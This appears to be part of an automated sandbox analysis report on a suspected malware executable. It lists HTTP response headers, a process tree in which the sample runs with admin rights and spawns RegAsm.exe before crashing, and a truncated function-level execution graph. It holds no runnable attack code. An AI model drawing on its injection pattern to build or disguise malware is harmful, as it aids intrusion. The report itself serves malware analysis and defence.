      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QStBm2hq40Cqm8HLDCvfJNwly4s1G4l7mu3xyYV9gGdr5NQbQX%2FNRWxXK7AW84WWNfTq3i9Ar6XrjGtvvApEuHULHx4eArPU1j%2FqXp85i1yXUEPtZoKhit%2BbONlUuVoCJGuraA%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 89c4a76bbb36c44f-EWR
      alt-svc: h3=":443"; ma=86400
      2024-07-01 07:24:01 UTC | 54 | IN | Data Raw: 33 30 0d 0a 64 54 69 61 6d 56 6a 2f 49 57 43 43 47 49 39 42 78 63 67 58 4d 67 4e 4a 65 7a 75 4c 79 38 35 59 51 67 63 38 2b 6b 50 39 68 57 51 75 5a 51 3d 3d 0d 0a
      Data Ascii: 30dTiamVj/IWCCGI9BxcgXMgNJezuLy85YQgc8+kP9hWQuZQ==
      2024-07-01 07:24:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
      Data Ascii: 0



      Target ID:0
      Start time:03:23:32
      Start date:01/07/2024
      Path:C:\Users\user\Desktop\mkFOY01Gl5.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\user\Desktop\mkFOY01Gl5.exe"
      Imagebase:0xf0000
      File size:528'384 bytes
      MD5 hash:0309DD0131150796EA99B30A62194FAE
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:true

      Target ID:1
      Start time:03:23:32
      Start date:01/07/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6d64d0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:3
      Start time:03:23:33
      Start date:01/07/2024
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      Imagebase:0x340000
      File size:65'440 bytes
      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:4
      Start time:03:23:33
      Start date:01/07/2024
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      Wow64 process (32bit):true
      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      Imagebase:0x570000
      File size:65'440 bytes
      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:7
      Start time:03:23:33
      Start date:01/07/2024
      Path:C:\Windows\SysWOW64\WerFault.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 304
      Imagebase:0x1000000
      File size:483'680 bytes
      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:11
      Start time:03:24:01
      Start date:01/07/2024
      Path:C:\Windows\SysWOW64\WerFault.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6176 -s 1796
      Imagebase:0x1000000
      File size:483'680 bytes
      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true


        Execution Graph

        Execution Coverage:4.1%
        Dynamic/Decrypted Code Coverage:0.4%
        Signature Coverage:1.6%
        Total number of Nodes:1970
        Total number of Limit Nodes:58
        execution_graph 19838 f6615 19839 f6621 __EH_prolog3_GS 19838->19839 19842 f666e 19839->19842 19843 f6687 19839->19843 19846 f6638 19839->19846 19840 f76c1 std::_Throw_Cpp_error 5 API calls 19841 f67a2 19840->19841 19854 f5983 19842->19854 19857 ffa9d 19843->19857 19846->19840 19848 f2a10 std::_Throw_Cpp_error 41 API calls 19848->19846 19849 f6746 19849->19848 19850 f66a6 19850->19849 19852 ffa9d 43 API calls 19850->19852 19853 f675f 19850->19853 19877 f4ac0 19850->19877 19852->19850 19853->19849 19888 1009fc 19853->19888 19855 ffa9d 43 API calls 19854->19855 19856 f598e 19855->19856 19856->19846 19858 ffaa9 __FrameHandler3::FrameUnwindToState 19857->19858 19859 ffacb 19858->19859 19860 ffab3 19858->19860 19901 ff57b EnterCriticalSection 19859->19901 19861 ff3fe __dosmaperr 14 API calls 19860->19861 19864 ffab8 19861->19864 19863 ffad5 19865 ffb71 19863->19865 19867 105f6b _Fputc 41 API calls 19863->19867 19866 fbbff __strnicoll 41 API calls 19864->19866 19902 ffa61 19865->19902 19869 ffac3 _Fputc 19866->19869 19872 ffaf2 19867->19872 19869->19850 19870 ffb77 19909 ffba1 19870->19909 19872->19865 19873 ffb49 19872->19873 19874 ff3fe __dosmaperr 14 API calls 19873->19874 19875 ffb4e 19874->19875 19876 fbbff __strnicoll 41 API calls 19875->19876 19876->19869 19878 f4af4 19877->19878 19879 f4ad2 19877->19879 19880 f4bcf 19878->19880 19881 f4b06 19878->19881 19879->19850 19882 f36f0 std::_Throw_Cpp_error 43 API calls 19880->19882 19884 f13f0 std::_Throw_Cpp_error 43 API calls 19881->19884 19886 f4b3e _Yarn 19882->19886 19883 fbc0f std::_Throw_Cpp_error 41 API calls 19885 f4bd9 19883->19885 19884->19886 19886->19883 19887 f4b8f _Yarn std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 19886->19887 19887->19850 19889 100a08 __FrameHandler3::FrameUnwindToState 19888->19889 19890 100a24 19889->19890 19891 100a0f 19889->19891 19913 ff57b EnterCriticalSection 19890->19913 19892 ff3fe __dosmaperr 14 API calls 19891->19892 19894 100a14 19892->19894 19896 fbbff __strnicoll 41 API 
calls 19894->19896 19895 100a2e 19914 100903 19895->19914 19899 100a1f 19896->19899 19899->19853 19901->19863 19903 ffa6d 19902->19903 19906 ffa82 __fread_nolock 19902->19906 19904 ff3fe __dosmaperr 14 API calls 19903->19904 19905 ffa72 19904->19905 19907 fbbff __strnicoll 41 API calls 19905->19907 19906->19870 19908 ffa7d 19907->19908 19908->19870 19912 ff58f LeaveCriticalSection 19909->19912 19911 ffba7 19911->19869 19912->19911 19913->19895 19915 10091b 19914->19915 19917 10098b 19914->19917 19916 105f6b _Fputc 41 API calls 19915->19916 19921 100921 19916->19921 19918 10a269 14 API calls 19917->19918 19919 100983 19917->19919 19918->19919 19925 100a67 19919->19925 19920 100973 19922 ff3fe __dosmaperr 14 API calls 19920->19922 19921->19917 19921->19920 19923 100978 19922->19923 19924 fbbff __strnicoll 41 API calls 19923->19924 19924->19919 19928 ff58f LeaveCriticalSection 19925->19928 19927 100a6d 19927->19899 19928->19927 18146 109433 18147 105f6b _Fputc 41 API calls 18146->18147 18149 109440 18147->18149 18148 10944c 18149->18148 18150 109498 18149->18150 18169 1095fb 18149->18169 18150->18148 18152 1094fa 18150->18152 18153 105fa7 41 API calls 18150->18153 18158 109529 18152->18158 18155 1094ed 18153->18155 18155->18152 18177 10a269 18155->18177 18159 105f6b _Fputc 41 API calls 18158->18159 18160 109538 18159->18160 18161 10954b 18160->18161 18162 1095de 18160->18162 18164 109568 18161->18164 18167 10958f 18161->18167 18163 108965 ___scrt_uninitialize_crt 66 API calls 18162->18163 18166 10950b 18163->18166 18165 108965 ___scrt_uninitialize_crt 66 API calls 18164->18165 18165->18166 18167->18166 18182 10a1ad 18167->18182 18170 109611 18169->18170 18171 109615 18169->18171 18170->18150 18172 10bdb6 __fread_nolock 41 API calls 18171->18172 18176 109664 18171->18176 18173 109636 18172->18173 18174 10963e SetFilePointerEx 18173->18174 18173->18176 18175 109655 GetFileSizeEx 18174->18175 18174->18176 18175->18176 18176->18150 18178 104eaf __dosmaperr 14 API calls 
std::_Locinfo::_Locinfo_ctor 15 API calls 18473 10b2c6 18472->18473 18474 10b2dc 18473->18474 18475 10b2ce 18473->18475 18507 10b4c2 18474->18507 18477 104f0c ___free_lconv_mon 14 API calls 18475->18477 18477->18471 18479 10b314 18480 ff3fe __dosmaperr 14 API calls 18479->18480 18481 10b319 18480->18481 18482 104f0c ___free_lconv_mon 14 API calls 18481->18482 18482->18471 18483 10b32f 18486 104f0c ___free_lconv_mon 14 API calls 18483->18486 18488 10b35b 18483->18488 18485 104f0c ___free_lconv_mon 14 API calls 18485->18471 18486->18488 18487 10b3a4 18487->18485 18488->18487 18518 10aee4 18488->18518 18490 10b3d3 __FrameHandler3::FrameUnwindToState 18489->18490 18492 10b3ed 18490->18492 18526 fe9a9 EnterCriticalSection 18490->18526 18493 10b29c 18492->18493 18496 fea1f __FrameHandler3::FrameUnwindToState 41 API calls 18492->18496 18500 10aff2 18493->18500 18494 10b429 18527 10b446 18494->18527 18497 10b466 18496->18497 18498 10b3fd 18498->18494 18499 104f0c ___free_lconv_mon 14 API calls 18498->18499 18499->18494 18531 100a6f 18500->18531 18503 10b013 GetOEMCP 18506 10b03c 18503->18506 18504 10b025 18505 10b02a GetACP 18504->18505 18504->18506 18505->18506 18506->18471 18506->18472 18508 10aff2 43 API calls 18507->18508 18509 10b4e2 18508->18509 18511 10b51f IsValidCodePage 18509->18511 18516 10b55b __fread_nolock 18509->18516 18510 f71da __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18513 10b309 18510->18513 18512 10b531 18511->18512 18511->18516 18514 10b560 GetCPInfo 18512->18514 18517 10b53a __fread_nolock 18512->18517 18513->18479 18513->18483 18514->18516 18514->18517 18516->18510 18573 10b0c6 18517->18573 18519 10aef0 __FrameHandler3::FrameUnwindToState 18518->18519 18648 fe9a9 EnterCriticalSection 18519->18648 18521 10aefa 18649 10af31 18521->18649 18526->18498 18530 fe9f1 LeaveCriticalSection 18527->18530 18529 10b44d 18529->18492 18530->18529 18532 100a86 18531->18532 18533 100a8d 18531->18533 18532->18503 18532->18504 18533->18532 18534 1041e0 
__Getctype 41 API calls 18533->18534 18535 100aae 18534->18535 18539 10507a 18535->18539 18540 100ac4 18539->18540 18541 10508d 18539->18541 18543 1050d8 18540->18543 18541->18540 18547 10cdcc 18541->18547 18544 105100 18543->18544 18545 1050eb 18543->18545 18544->18532 18545->18544 18568 10b4af 18545->18568 18548 10cdd8 __FrameHandler3::FrameUnwindToState 18547->18548 18549 1041e0 __Getctype 41 API calls 18548->18549 18550 10cde1 18549->18550 18557 10ce27 18550->18557 18560 fe9a9 EnterCriticalSection 18550->18560 18552 10cdff 18561 10ce4d 18552->18561 18557->18540 18558 fea1f __FrameHandler3::FrameUnwindToState 41 API calls 18559 10ce4c 18558->18559 18560->18552 18562 10ce10 18561->18562 18563 10ce5b __Getctype 18561->18563 18565 10ce2c 18562->18565 18563->18562 18564 10cb80 __Getctype 14 API calls 18563->18564 18564->18562 18566 fe9f1 std::_Lockit::~_Lockit LeaveCriticalSection 18565->18566 18567 10ce23 18566->18567 18567->18557 18567->18558 18569 1041e0 __Getctype 41 API calls 18568->18569 18570 10b4b4 18569->18570 18571 10b3c7 __strnicoll 41 API calls 18570->18571 18572 10b4bf 18571->18572 18572->18544 18574 10b0ee GetCPInfo 18573->18574 18583 10b1b7 18573->18583 18580 10b106 18574->18580 18574->18583 18576 f71da __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18578 10b270 18576->18578 18578->18516 18584 1079fa 18580->18584 18582 107cf1 45 API calls 18582->18583 18583->18576 18585 100a6f __strnicoll 41 API calls 18584->18585 18586 107a1a 18585->18586 18604 10a33b 18586->18604 18588 107ade 18590 f71da __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18588->18590 18589 107ad6 18607 f6ff4 18589->18607 18594 107b01 18590->18594 18591 107a47 18591->18588 18591->18589 18593 105136 std::_Locinfo::_Locinfo_ctor 15 API calls 18591->18593 18595 107a6c __fread_nolock __alloca_probe_16 18591->18595 18593->18595 18599 107cf1 18594->18599 18595->18589 18596 10a33b __strnicoll MultiByteToWideChar 18595->18596 18597 107ab7 18596->18597 18597->18589 18598 107ac2 
GetStringTypeW 18597->18598 18598->18589 18600 100a6f __strnicoll 41 API calls 18599->18600 18601 107d04 18600->18601 18614 107b03 18601->18614 18605 10a34c MultiByteToWideChar 18604->18605 18605->18591 18608 f700f 18607->18608 18609 f6ffe 18607->18609 18608->18588 18609->18608 18611 fbd65 18609->18611 18612 104f0c ___free_lconv_mon 14 API calls 18611->18612 18613 fbd7d 18612->18613 18613->18608 18615 107b1e __strnicoll 18614->18615 18616 10a33b __strnicoll MultiByteToWideChar 18615->18616 18620 107b64 18616->18620 18617 107cdc 18618 f71da __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18617->18618 18619 107cef 18618->18619 18619->18582 18620->18617 18621 105136 std::_Locinfo::_Locinfo_ctor 15 API calls 18620->18621 18623 107b8a __alloca_probe_16 18620->18623 18630 107c10 18620->18630 18621->18623 18622 f6ff4 __freea 14 API calls 18622->18617 18624 10a33b __strnicoll MultiByteToWideChar 18623->18624 18623->18630 18625 107bcf 18624->18625 18625->18630 18642 10696e 18625->18642 18628 107c01 18628->18630 18634 10696e std::_Locinfo::_Locinfo_ctor 6 API calls 18628->18634 18629 107c39 18631 107cc4 18629->18631 18632 105136 std::_Locinfo::_Locinfo_ctor 15 API calls 18629->18632 18635 107c4b __alloca_probe_16 18629->18635 18630->18622 18633 f6ff4 __freea 14 API calls 18631->18633 18632->18635 18633->18630 18634->18630 18635->18631 18636 10696e std::_Locinfo::_Locinfo_ctor 6 API calls 18635->18636 18637 107c8e 18636->18637 18637->18631 18638 10a3b7 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 18637->18638 18639 107ca8 18638->18639 18639->18631 18640 107cb1 18639->18640 18641 f6ff4 __freea 14 API calls 18640->18641 18641->18630 18643 106460 std::_Locinfo::_Locinfo_ctor 5 API calls 18642->18643 18644 106979 18643->18644 18645 10697f 18644->18645 18646 1069cb __strnicoll 5 API calls 18644->18646 18645->18628 18645->18629 18645->18630 18647 1069bf LCMapStringW 18646->18647 18647->18645 18648->18521 18659 100032 18649->18659 18651 10af53 18652 100032 __fread_nolock 
41 API calls 18651->18652 18653 10af72 18652->18653 18654 10af07 18653->18654 18655 104f0c ___free_lconv_mon 14 API calls 18653->18655 18656 10af25 18654->18656 18655->18654 18673 fe9f1 LeaveCriticalSection 18656->18673 18658 10af13 18658->18487 18660 100043 18659->18660 18663 10003f _Yarn 18659->18663 18661 10004a 18660->18661 18666 10005d __fread_nolock 18660->18666 18662 ff3fe __dosmaperr 14 API calls 18661->18662 18664 10004f 18662->18664 18663->18651 18665 fbbff __strnicoll 41 API calls 18664->18665 18665->18663 18666->18663 18667 100094 18666->18667 18668 10008b 18666->18668 18667->18663 18671 ff3fe __dosmaperr 14 API calls 18667->18671 18669 ff3fe __dosmaperr 14 API calls 18668->18669 18670 100090 18669->18670 18672 fbbff __strnicoll 41 API calls 18670->18672 18671->18670 18672->18663 18673->18658 18675 103d97 18674->18675 18676 103da5 18674->18676 18675->18676 18678 103dbd 18675->18678 18677 ff3fe __dosmaperr 14 API calls 18676->18677 18682 103dad 18677->18682 18680 103db7 18678->18680 18681 ff3fe __dosmaperr 14 API calls 18678->18681 18679 fbbff __strnicoll 41 API calls 18679->18680 18680->18432 18681->18682 18682->18679 18684 101baf 18683->18684 18685 101bde 18683->18685 18684->18433 18686 101bf5 18685->18686 18687 104f0c ___free_lconv_mon 14 API calls 18685->18687 18688 104f0c ___free_lconv_mon 14 API calls 18686->18688 18687->18685 18688->18684 18691 f719c 18689->18691 18692 f71b6 18691->18692 18693 1014ed std::_Facet_Register 2 API calls 18691->18693 18694 f71b8 std::_Facet_Register 18691->18694 18728 fea63 18691->18728 18692->18252 18697 114000 18692->18697 18693->18691 18737 f8020 18694->18737 18696 f79c0 18740 f1160 18697->18740 18702 f7197 std::_Facet_Register 16 API calls 18703 114021 18702->18703 18704 f7197 std::_Facet_Register 16 API calls 18703->18704 18719 114060 18703->18719 18709 114031 18704->18709 18705 1140aa 18710 f528b std::_Throw_Cpp_error 43 API calls 18705->18710 18706 11406a GetCurrentThreadId 18707 1140b1 18706->18707 18708 114074 
18706->18708 18712 f528b std::_Throw_Cpp_error 43 API calls 18707->18712 18777 f50d5 WaitForSingleObjectEx 18708->18777 18762 fe516 18709->18762 18710->18707 18713 1140b8 18712->18713 18716 f528b std::_Throw_Cpp_error 43 API calls 18713->18716 18721 1140bf 18716->18721 18717 114087 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 18717->18254 18718 114057 18718->18719 18720 11409d 18718->18720 18719->18705 18719->18706 18783 f528b 18720->18783 18724 f1160 71 API calls 18723->18724 18725 1145a2 18724->18725 18726 f1e70 72 API calls 18725->18726 18727 1145a8 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 18726->18727 18727->18252 18730 105136 18728->18730 18729 105174 18732 ff3fe __dosmaperr 14 API calls 18729->18732 18730->18729 18731 10515f HeapAlloc 18730->18731 18735 105148 __dosmaperr 18730->18735 18733 105172 18731->18733 18731->18735 18734 105179 18732->18734 18733->18734 18734->18691 18735->18729 18735->18731 18736 1014ed std::_Facet_Register 2 API calls 18735->18736 18736->18735 18738 f8067 RaiseException 18737->18738 18739 f803a 18737->18739 18738->18696 18739->18738 18741 f1196 18740->18741 18789 f2950 18741->18789 18744 f11e3 18748 f11e8 18744->18748 18794 f4dd0 18744->18794 18745 f1343 std::ios_base::_Init 18801 f2860 18745->18801 18746 f131d 18754 f1e70 18746->18754 18747 f130a 18747->18746 18797 f3540 18747->18797 18748->18745 18748->18747 18751 f1377 18752 f8020 CallUnexpected RaiseException 18751->18752 18753 f1385 18752->18753 18755 f1e90 18754->18755 18958 f1ee0 18755->18958 18759 f1e9a 18987 f4be0 18759->18987 18760 f46e0 43 API calls 18761 f1ed5 18760->18761 18761->18702 18763 fe537 18762->18763 18764 fe523 18762->18764 19260 fe4c6 18763->19260 18765 ff3fe __dosmaperr 14 API calls 18764->18765 18767 fe528 18765->18767 18769 fbbff __strnicoll 41 API calls 18767->18769 18771 fe533 18769->18771 18770 fe54c CreateThread 18772 fe56b GetLastError 18770->18772 18773 fe577 18770->18773 19285 fe3ba 18770->19285 18771->18718 19269 ff3a4 18772->19269 19274 fe438 18773->19274 
18778 f511e 18777->18778 18779 f50ec 18777->18779 18778->18713 18778->18717 18780 f5109 CloseHandle 18779->18780 18781 f50f3 GetExitCodeThread 18779->18781 18780->18778 18781->18778 18782 f5104 18781->18782 18782->18780 18784 f52a1 std::_Throw_Cpp_error 18783->18784 19325 f51ab 18784->19325 18790 f2967 18789->18790 18791 f297b 18790->18791 18815 f46e0 18790->18815 18791->18744 18827 f6a01 18794->18827 18795 f4de3 18795->18748 18798 f35a3 18797->18798 18799 f357e 18797->18799 18798->18746 18799->18798 18831 f4d60 18799->18831 18802 f28a0 18801->18802 18802->18802 18851 f1450 18802->18851 18804 f28b4 18859 f2490 18804->18859 18806 f28c2 18807 f28ea std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 18806->18807 18810 f2911 18806->18810 18808 f71da __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18807->18808 18809 f290b 18808->18809 18809->18751 18811 fbc0f std::_Throw_Cpp_error 41 API calls 18810->18811 18812 f2916 18811->18812 18879 f7f9e 18812->18879 18816 f2997 18815->18816 18817 f4721 18815->18817 18816->18744 18818 f2950 43 API calls 18817->18818 18819 f472a 18818->18819 18820 f47a2 18819->18820 18821 f47dc std::ios_base::_Init 18819->18821 18820->18816 18822 f3540 43 API calls 18820->18822 18823 f2860 std::ios_base::_Init 43 API calls 18821->18823 18822->18816 18824 f480e 18823->18824 18825 f8020 CallUnexpected RaiseException 18824->18825 18826 f481c 18825->18826 18828 f6a10 18827->18828 18829 f6a23 _Yarn 18827->18829 18828->18795 18829->18828 18830 1006cb 69 API calls 18829->18830 18830->18828 18834 f39e0 18831->18834 18833 f4d7e 18833->18798 18835 f39fd 18834->18835 18836 f39f4 18834->18836 18835->18833 18837 f8020 CallUnexpected RaiseException 18836->18837 18838 f3a0c std::ios_base::_Init 18836->18838 18837->18838 18839 f2860 std::ios_base::_Init 43 API calls 18838->18839 18840 f3a43 18839->18840 18841 f8020 CallUnexpected RaiseException 18840->18841 18843 f3a52 18841->18843 18842 f3a80 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 18842->18833 18843->18842 18846 fbc0f 
18843->18846 18847 fbb4b __strnicoll 41 API calls 18846->18847 18848 fbc1e 18847->18848 18849 fbc2c __Getctype 11 API calls 18848->18849 18850 fbc2b 18849->18850 18852 f14d9 18851->18852 18856 f1460 18851->18856 18908 f36f0 18852->18908 18854 f1465 _Yarn 18854->18804 18856->18854 18887 f13f0 18856->18887 18858 f14b3 _Yarn 18858->18804 18860 f24b8 18859->18860 18861 f2675 18860->18861 18864 f24c9 18860->18864 18862 f36f0 std::_Throw_Cpp_error 43 API calls 18861->18862 18863 f267a 18862->18863 18865 fbc0f std::_Throw_Cpp_error 41 API calls 18863->18865 18867 f13f0 std::_Throw_Cpp_error 43 API calls 18864->18867 18872 f24ce _Yarn 18864->18872 18866 f267f 18865->18866 18868 fbc0f std::_Throw_Cpp_error 41 API calls 18866->18868 18867->18872 18869 f2684 18868->18869 18871 f7f9e std::invalid_argument::invalid_argument 42 API calls 18869->18871 18870 f25ba std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 18873 f7f9e std::invalid_argument::invalid_argument 42 API calls 18870->18873 18874 f26b2 18871->18874 18872->18863 18872->18870 18875 f260f 18873->18875 18874->18806 18875->18866 18876 f2640 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 18875->18876 18877 f71da __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18876->18877 18878 f266f 18877->18878 18878->18806 18880 f2941 18879->18880 18881 f7fab 18879->18881 18880->18751 18881->18880 18882 fea63 _Yarn 15 API calls 18881->18882 18883 f7fc8 18882->18883 18884 f7fd8 18883->18884 18885 103d89 std::invalid_argument::invalid_argument 41 API calls 18883->18885 18886 fbd65 std::locale::_Locimp::~_Locimp 14 API calls 18884->18886 18885->18884 18886->18880 18888 f1423 18887->18888 18889 f1400 18887->18889 18890 f1434 18888->18890 18893 f7197 std::_Facet_Register 16 API calls 18888->18893 18891 f143a 18889->18891 18892 f1407 18889->18892 18890->18858 18943 f36b0 18891->18943 18895 f7197 std::_Facet_Register 16 API calls 18892->18895 18896 f142d 18893->18896 18897 f140d 18895->18897 18896->18858 18898 f1416 18897->18898 18899 fbc0f 
std::_Throw_Cpp_error 41 API calls 18897->18899 18898->18858 18900 f1444 18899->18900 18901 f14d9 18900->18901 18905 f1460 18900->18905 18902 f36f0 std::_Throw_Cpp_error 43 API calls 18901->18902 18904 f14de 18902->18904 18903 f1465 _Yarn 18903->18858 18905->18903 18906 f13f0 std::_Throw_Cpp_error 43 API calls 18905->18906 18907 f14b3 _Yarn 18906->18907 18907->18858 18947 f506a 18908->18947 18944 f36bb std::_Facet_Register 18943->18944 18945 f8020 CallUnexpected RaiseException 18944->18945 18946 f36ca 18945->18946 18952 f4f8d 18947->18952 18950 f8020 CallUnexpected RaiseException 18951 f5089 18950->18951 18955 f27d0 18952->18955 18956 f7f9e std::invalid_argument::invalid_argument 42 API calls 18955->18956 18957 f27fe 18956->18957 18957->18950 18998 f4ecb 18958->18998 18961 f4ecb std::_Lockit::_Lockit 7 API calls 18963 f1f14 18961->18963 18962 f2064 18964 f4f23 std::_Lockit::~_Lockit 2 API calls 18962->18964 19004 f4f23 18963->19004 18966 f207d 18964->18966 18965 f1f35 18965->18962 18968 f1f97 18965->18968 18969 f1f82 18965->18969 18966->18759 18971 f7197 std::_Facet_Register 16 API calls 18968->18971 18970 f4f23 std::_Lockit::~_Lockit 2 API calls 18969->18970 18972 f1f8d 18970->18972 18974 f1f9e 18971->18974 18972->18759 18973 f203a 18975 f205e 18973->18975 19032 f2a70 18973->19032 18974->18973 18977 f4ecb std::_Lockit::_Lockit 7 API calls 18974->18977 19047 f5448 18975->19047 18979 f1fd2 18977->18979 18980 f2018 18979->18980 18981 f2087 18979->18981 19011 f5578 18980->19011 19050 f50aa 18981->19050 18988 f2950 43 API calls 18987->18988 18989 f4c1e 18988->18989 18990 f4ce3 std::ios_base::_Init 18989->18990 18992 f4ca8 18989->18992 18994 f2860 std::ios_base::_Init 43 API calls 18990->18994 18991 f1ece 18991->18760 18992->18991 18993 f3540 43 API calls 18992->18993 18993->18991 18995 f4d15 18994->18995 18996 f8020 CallUnexpected RaiseException 18995->18996 18997 f4d23 18996->18997 18999 f4eda 18998->18999 19000 f4ee1 18998->19000 19055 fea08 18999->19055 19001 f1efa 
19000->19001 19060 f6d2a EnterCriticalSection 19000->19060 19001->18961 19001->18965 19005 fea16 19004->19005 19006 f4f2d 19004->19006 19113 fe9f1 LeaveCriticalSection 19005->19113 19007 f4f40 19006->19007 19112 f6d38 LeaveCriticalSection 19006->19112 19007->18965 19010 fea1d 19010->18965 19114 fecc3 19011->19114 19015 f559c 19016 f55ac 19015->19016 19017 fecc3 std::_Locinfo::_Locinfo_ctor 68 API calls 19015->19017 19018 f53d2 _Yarn 15 API calls 19016->19018 19017->19016 19019 f2023 19018->19019 19020 f568d 19019->19020 19220 fee34 19020->19220 19022 f5696 __Getctype 19023 f56ce 19022->19023 19024 f56b0 19022->19024 19026 fecfb __Getctype 41 API calls 19023->19026 19225 fecfb 19024->19225 19027 f56b7 19026->19027 19230 fee59 19027->19230 19030 f56ef 19030->18973 19253 f55c3 19032->19253 19035 fbd65 std::locale::_Locimp::~_Locimp 14 API calls 19038 f2a89 19035->19038 19036 f2ab7 19041 f2ace 19036->19041 19042 fbd65 std::locale::_Locimp::~_Locimp 14 API calls 19036->19042 19037 f2aa0 19037->19036 19040 fbd65 std::locale::_Locimp::~_Locimp 14 API calls 19037->19040 19038->19037 19039 fbd65 std::locale::_Locimp::~_Locimp 14 API calls 19038->19039 19039->19037 19040->19036 19043 f2ae5 19041->19043 19044 fbd65 std::locale::_Locimp::~_Locimp 14 API calls 19041->19044 19042->19041 19045 f2afc 19043->19045 19046 fbd65 std::locale::_Locimp::~_Locimp 14 API calls 19043->19046 19044->19043 19046->19045 19048 f7197 std::_Facet_Register 16 API calls 19047->19048 19049 f5453 19048->19049 19049->18962 19257 f5001 19050->19257 19053 f8020 CallUnexpected RaiseException 19054 f50c9 19053->19054 19061 106a70 19055->19061 19060->19001 19082 106376 19061->19082 19081 106aa2 19081->19081 19083 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19082->19083 19084 10638c 19083->19084 19085 106390 19084->19085 19086 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19085->19086 19087 1063a6 19086->19087 19088 1063aa 19087->19088 19089 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19088->19089 
19090 1063c0 19089->19090 19091 1063c4 19090->19091 19092 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19091->19092 19093 1063da 19092->19093 19094 1063de 19093->19094 19095 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19094->19095 19096 1063f4 19095->19096 19097 1063f8 19096->19097 19098 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19097->19098 19099 10640e 19098->19099 19100 106412 19099->19100 19101 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19100->19101 19102 106428 19101->19102 19103 10642c 19102->19103 19104 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19103->19104 19105 106442 19104->19105 19106 106460 19105->19106 19107 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19106->19107 19108 106476 19107->19108 19109 106446 19108->19109 19110 10655f std::_Locinfo::_Locinfo_ctor 5 API calls 19109->19110 19111 10645c 19110->19111 19111->19081 19112->19007 19113->19010 19115 106a70 std::_Locinfo::_Locinfo_ctor 5 API calls 19114->19115 19116 fecd0 19115->19116 19125 fea6e 19116->19125 19119 f53d2 19120 f53e0 19119->19120 19124 f540b _Yarn 19119->19124 19121 fbd65 std::locale::_Locimp::~_Locimp 14 API calls 19120->19121 19122 f53ec 19120->19122 19121->19122 19122->19122 19123 fea63 _Yarn 15 API calls 19122->19123 19122->19124 19123->19124 19124->19015 19126 fea7a __FrameHandler3::FrameUnwindToState 19125->19126 19133 fe9a9 EnterCriticalSection 19126->19133 19128 fea88 19134 feac9 19128->19134 19133->19128 19159 fec28 19134->19159 19136 feae4 19137 fea95 19136->19137 19138 1041e0 __Getctype 41 API calls 19136->19138 19156 feabd 19137->19156 19139 feaf1 19138->19139 19183 107725 19139->19183 19142 feb1d 19142->19137 19145 fbc2c __Getctype 11 API calls 19142->19145 19143 105136 std::_Locinfo::_Locinfo_ctor 15 API calls 19144 feb42 19143->19144 19144->19137 19147 107725 std::_Locinfo::_Locinfo_ctor 43 API calls 19144->19147 19146 fec27 19145->19146 19148 feb5e 19147->19148 19149 feb65 19148->19149 19150 feb80 19148->19150 19149->19142 19151 feb77 
